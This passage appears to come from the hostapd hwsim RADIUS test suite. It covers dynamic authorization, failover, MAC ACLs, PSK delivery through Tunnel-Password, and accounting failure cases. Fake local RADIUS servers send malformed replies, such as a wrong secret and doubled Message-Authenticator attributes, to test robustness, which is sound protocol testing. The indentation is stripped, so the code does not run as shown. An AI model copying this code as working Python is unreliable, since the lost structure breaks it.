params['radius_das_require_event_timestamp'] = "1"
params['radius_das_require_message_authenticator'] = "1"
params['radius_das_time_window'] = "10"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].own_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()) - 50)
add_message_auth_req(req)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
add_message_auth_req(req)
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
def test_radius_das_coa(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - CoA"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
# hostapd does not currently support CoA-Request, so NAK is expected
logger.info("CoA-Request with matching Acct-Session-Id")
req = radius_das.CoAPacket(dict=dict, secret=b"secret",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.CoANAK, error_cause=405)
def test_radius_ipv6(dev, apdev):
"""RADIUS connection over IPv6"""
params = {}
params['ssid'] = 'as'
params['beacon_int'] = '2000'
params['radius_server_clients'] = 'auth_serv/radius_clients_ipv6.conf'
params['radius_server_ipv6'] = '1'
params['radius_server_auth_port'] = '18129'
params['radius_server_acct_port'] = '18139'
params['eap_server'] = '1'
params['eap_user_file'] = 'auth_serv/eap_user.conf'
params['ca_cert'] = 'auth_serv/ca.pem'
params['server_cert'] = 'auth_serv/server.pem'
params['private_key'] = 'auth_serv/server.key'
hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="radius-ipv6")
params['auth_server_addr'] = "::0"
params['auth_server_port'] = "18129"
params['acct_server_addr'] = "::0"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['own_ip_addr'] = "::0"
hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-ipv6")
def test_radius_macacl(dev, apdev):
"""RADIUS MAC ACL"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
# Invalid VLAN ID from RADIUS server
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].request("REMOVE_NETWORK all")
dev[2].wait_disconnected()
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_acct(dev, apdev):
"""RADIUS MAC ACL and accounting enabled"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected()
dev[1].request("RECONNECT")
def test_radius_macacl_oom(dev, apdev):
"""RADIUS MAC ACL and OOM"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "hostapd_allowed_address"):
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 2, "hostapd_allowed_address"):
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 2, "=hostapd_allowed_address"):
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_unreachable(dev, apdev):
"""RADIUS MAC ACL and server unreachable"""
params = hostapd.radius_params()
params['auth_server_port'] = "18139"
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=3)
if ev is not None:
raise Exception("Unexpected connection")
logger.info("Fix authentication server port")
hapd.set("auth_server_port", "1812")
hapd.disable()
hapd.enable()
dev[0].wait_connected()
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
def test_radius_failover(dev, apdev):
"""RADIUS Authentication and Accounting server failover"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-failover")
params["auth_server_addr"] = "192.168.213.17"
params["auth_server_port"] = "1812"
params["auth_server_shared_secret"] = "testing"
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "testing"
params['radius_retry_primary_interval'] = "20"
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
hapd.set("auth_server_addr", "127.0.0.1")
hapd.set("auth_server_port", "1812")
hapd.set("auth_server_shared_secret", "radius")
hapd.set('acct_server_addr', "127.0.0.1")
hapd.set('acct_server_port', "1813")
hapd.set('acct_server_shared_secret', "radius")
hapd.enable()
ev = hapd.wait_event(["AP-ENABLED", "AP-DISABLED"], timeout=30)
if ev is None:
raise Exception("AP startup timed out")
if "AP-ENABLED" not in ev:
raise Exception("AP startup failed")
start = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[0].request("SET EAPOL::authPeriod 5")
connect(dev[0], "radius-failover", wait_connect=False)
dev[0].wait_connected(timeout=20)
finally:
dev[0].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
end = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[1].request("SET EAPOL::authPeriod 5")
if end - start < 21:
time.sleep(21 - (end - start))
connect(dev[1], "radius-failover", wait_connect=False)
dev[1].wait_connected(timeout=20)
finally:
dev[1].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
def run_pyrad_server(srv, t_events):
srv.RunWithStop(t_events)
def test_radius_protocol(dev, apdev):
"""RADIUS Authentication protocol tests with a fake server"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['msg_auth'].is_set():
logger.info("Add Message-Authenticator")
if self.t_events['wrong_secret'].is_set():
logger.info("Use incorrect RADIUS shared secret")
pw = b"incorrect"
else:
pw = reply.secret
hmac_obj = hmac.new(pw)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
if self.t_events['double_msg_auth'].is_set():
logger.info("Include two Message-Authenticator attributes")
else:
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['msg_auth'] = threading.Event()
t_events['wrong_secret'] = threading.Event()
t_events['double_msg_auth'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
params = hostapd.wpa2_eap_params(ssid="radius-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-test", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['msg_auth'].set()
t_events['wrong_secret'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['wrong_secret'].clear()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
time.sleep(0.1)
dev[0].dump_monitor()
t_events['double_msg_auth'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def build_tunnel_password(secret, authenticator, psk):
a = b"\xab\xcd"
psk = psk.encode()
padlen = 16 - (1 + len(psk)) % 16
if padlen == 16:
padlen = 0
p = struct.pack('B', len(psk)) + psk + padlen * b'\x00'
cc_all = bytes()
b = hashlib.md5(secret + authenticator + a).digest()
while len(p) > 0:
pp = bytearray(p[0:16])
p = p[16:]
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
cc_all += cc
b = hashlib.md5(secret + cc).digest()
data = b'\x00' + a + bytes(cc_all)
return data
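# Illustrative counterpart to build_tunnel_password() (not used by the tests): a
# minimal sketch of the inverse operation, assuming Python 3 and the layout produced
# above - tag (1 octet), salt (2 octets), then the RFC 2868 salt-encrypted,
# length-prefixed, zero-padded password.
def decode_tunnel_password(secret, authenticator, data):
    salt = data[1:3]
    enc = data[3:]
    plain = b''
    # first key block mixes in the Request Authenticator and the salt
    b = hashlib.md5(secret + authenticator + salt).digest()
    while len(enc) > 0:
        block = enc[0:16]
        enc = enc[16:]
        plain += bytes(block[i] ^ b[i] for i in range(len(block)))
        # subsequent key blocks are chained on the previous ciphertext block
        b = hashlib.md5(secret + block).digest()
    plen = plain[0]
    return plain[1:1 + plen].decode()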
def start_radius_psk_server(psk, invalid_code=False, acct_interim_interval=0,
session_timeout=0, reject=False):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['invalid_code']:
reply.code = pyrad.packet.AccessRequest
if self.t_events['reject']:
reply.code = pyrad.packet.AccessReject
data = build_tunnel_password(reply.secret, pkt.authenticator,
self.t_events['psk'])
reply.AddAttribute("Tunnel-Password", data)
if self.t_events['acct_interim_interval']:
reply.AddAttribute("Acct-Interim-Interval",
self.t_events['acct_interim_interval'])
if self.t_events['session_timeout']:
reply.AddAttribute("Session-Timeout",
self.t_events['session_timeout'])
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['psk'] = psk
t_events['invalid_code'] = invalid_code
t_events['acct_interim_interval'] = acct_interim_interval
t_events['session_timeout'] = session_timeout
t_events['reject'] = reject
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
return t, t_events
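# AP parameters shared by the wpa_psk_radius tests below: macaddr_acl=2 makes hostapd
# consult the external RADIUS server for each connecting station, and wpa_psk_radius=2
# requires that server to supply the per-station passphrase/PSK (delivered in the
# Tunnel-Password attribute built above) instead of a locally configured one.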
def hostapd_radius_psk_test_params():
params = hostapd.radius_params()
params['ssid'] = "test-wpa2-psk"
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '2'
params['auth_server_port'] = "18138"
return params
def test_radius_psk(dev, apdev):
"""WPA2 with PSK from RADIUS"""
t, t_events = start_radius_psk_server("12345678")
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412")
t_events['psk'] = "0123456789abcdef"
dev[1].connect("test-wpa2-psk", psk="0123456789abcdef",
scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_invalid(dev, apdev):
"""WPA2 with invalid PSK from RADIUS"""
t, t_events = start_radius_psk_server("1234567")
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_invalid2(dev, apdev):
"""WPA2 with invalid PSK (hexstring) from RADIUS"""
t, t_events = start_radius_psk_server(64*'q')
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_hex_psk(dev, apdev):
"""WPA2 with PSK hexstring from RADIUS"""
t, t_events = start_radius_psk_server(64*'2', acct_interim_interval=19,
session_timeout=123)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", raw_psk=64*'2', scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_unknown_code(dev, apdev):
"""WPA2 with PSK from RADIUS and unknown code"""
t, t_events = start_radius_psk_server(64*'2', invalid_code=True)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_reject(dev, apdev):
"""WPA2 with PSK from RADIUS and reject"""
t, t_events = start_radius_psk_server("12345678", reject=True)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-AUTH-REJECT"], timeout=10)
if ev is None:
raise Exception("No CTRL-EVENT-AUTH-REJECT event")
dev[0].request("DISCONNECT")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_oom(dev, apdev):
"""WPA2 with PSK from RADIUS and OOM"""
t, t_events = start_radius_psk_server(64*'2')
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "=hostapd_acl_recv_radius"):
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_default(dev, apdev):
"""WPA2 with default PSK"""
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '1'
params['wpa_passphrase'] = 'qwertyuiop'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid, psk="qwertyuiop", scan_freq="2412")
dev[0].dump_monitor()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
hapd.disable()
hapd.set("wpa_psk_radius", "2")
hapd.enable()
dev[0].connect(ssid, psk="qwertyuiop", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-AUTH-REJECT"], timeout=10)
if ev is None:
raise Exception("No CTRL-EVENT-AUTH-REJECT event")
dev[0].request("DISCONNECT")
def test_radius_auth_force_client_addr(dev, apdev):
"""RADIUS client address specified"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['radius_client_addr'] = "127.0.0.1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth")
@remote_compatible
def test_radius_auth_force_invalid_client_addr(dev, apdev):
"""RADIUS client address specified and invalid address"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
#params['radius_client_addr'] = "10.11.12.14"
params['radius_client_addr'] = "1::2"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected connection")
def add_message_auth(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = req._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(req.authenticator)
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_server_failures(dev, apdev):
"""RADIUS server failure cases"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
dict = pyrad.dictionary.Dictionary("dictionary.radius")
client = pyrad.client.Client(server="127.0.0.1", authport=1812,
secret=b"radius", dict=dict)
client.retries = 1
client.timeout = 1
# unexpected State
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
req['State'] = b'foo-state'
add_message_auth(req)
reply = client.SendPacket(req)
if reply.code != pyrad.packet.AccessReject:
raise Exception("Unexpected RADIUS response code " + str(reply.code))
# no EAP-Message
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
add_message_auth(req)
try:
reply = client.SendPacket(req)
raise Exception("Unexpected response")
except pyrad.client.Timeout:
pass
def test_ap_vlan_wpa2_psk_radius_required(dev, apdev):
"""AP VLAN with WPA2-PSK and RADIUS attributes required"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
secret = reply.secret
if self.t_events['extra'].is_set():
reply.AddAttribute("Chargeable-User-Identity", "test-cui")
reply.AddAttribute("User-Name", "test-user")
if self.t_events['long'].is_set():
reply.AddAttribute("Tunnel-Type", 13)
reply.AddAttribute("Tunnel-Medium-Type", 6)
reply.AddAttribute("Tunnel-Private-Group-ID", "1")
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['long'] = threading.Event()
t_events['extra'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['dynamic_vlan'] = "2"
params['wpa_passphrase'] = '0123456789abcdefghi'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
logger.info("connecting without VLAN")
dev[0].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters")
logger.info("connecting without VLAN failed as expected")
logger.info("connecting without VLAN (CUI/User-Name)")
t_events['extra'].set()
dev[1].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[1].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters(2)")
logger.info("connecting without VLAN failed as expected(2)")
t_events['extra'].clear()
t_events['long'].set()
logger.info("connecting with VLAN")
dev[2].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-SSID-TEMP-DISABLED" in ev:
raise Exception("Unexpected failure with vlan parameters")
logger.info("connecting with VLAN succeeded as expected")
finally:
t_events['stop'].set()
t.join()
def test_radius_mppe_failure(dev, apdev):
"""RADIUS failure when adding MPPE keys"""
params = { "ssid": "as", "beacon_int": "2000",
"radius_server_clients": "auth_serv/radius_clients.conf",
"radius_server_auth_port": '18127',
"eap_server": "1",
"eap_user_file": "auth_serv/eap_user.conf",
"ca_cert": "auth_serv/ca.pem",
"server_cert": "auth_serv/server.pem",
"private_key": "auth_serv/server.key" }
authsrv = hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['auth_server_port'] = "18127"
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(authsrv, 1, "os_get_random;radius_msg_add_mppe_keys"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", eap="TTLS",
identity="user", anonymous_identity="ttls",
password="password",
ca_cert="auth_serv/ca.pem", phase2="autheap=GTC",
wait_connect=False, scan_freq="2412")
dev[0].wait_disconnected()
dev[0].request("REMOVE_NETWORK all")
def test_radius_acct_failure(dev, apdev):
"""RADIUS Accounting and failure to add attributes"""
# Connection goes through, but Accounting-Request cannot be sent out due to
# NAS-Identifier being too long to fit into a RADIUS attribute.
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'nas_identifier': 255*'A' }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
def test_radius_acct_failure_oom(dev, apdev):
"""RADIUS Accounting and failure to add attributes due to OOM"""
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'radius_acct_interim_interval': "1",
'nas_identifier': 250*'A',
'radius_acct_req_attr': [ "126:s:" + 250*'B',
"77:s:" + 250*'C',
"127:s:" + 250*'D',
"181:s:" + 250*'E' ] }
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "accounting_sta_report"):
dev[1].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[1].request("REMOVE_NETWORK all")
dev[1].wait_disconnected()
tests = [ (1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"),
(2, "radius_msg_add_attr;accounting_msg"),
(3, "radius_msg_add_attr;accounting_msg") ]
for count, func in tests:
with fail_test(hapd, count, func):
dev[0].connect("radius-acct-open", key_mgmt="NONE",
scan_freq="2412")
wait_fail_trigger(hapd, "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
with fail_test(hapd, 8,
"radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_sta_report"):
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
wait_fail_trigger(hapd, "GET_FAIL")
with fail_test(hapd, 1, "radius_msg_add_attr;=accounting_report_state"):
hapd.disable()
def test_radius_acct_failure_oom_rsn(dev, apdev):
"""RADIUS Accounting in RSN and failure to add attributes due to OOM"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
params['nas_identifier'] = 250*'A'
params['radius_acct_req_attr'] = [ "126:s:" + 250*'B',
"77:s:" + 250*'C',
"127:s:" + 250*'D',
"181:s:" + 250*'E' ]
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
connect(dev[0], "radius-acct")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "accounting_sta_report"):
connect(dev[1], "radius-acct")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[2].scan_for_bss(bssid, freq="2412")
connect(dev[2], "radius-acct")
for i in range(1, 8):
with alloc_fail(hapd, i, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
for i in range(1, 15):
with alloc_fail(hapd, i, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_sta_report"):
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
def test_radius_acct_failure_sta_data(dev, apdev):
"""RADIUS Accounting and failure to get STA data"""
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius" }
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(hapd, 1, "accounting_sta_update_stats"):
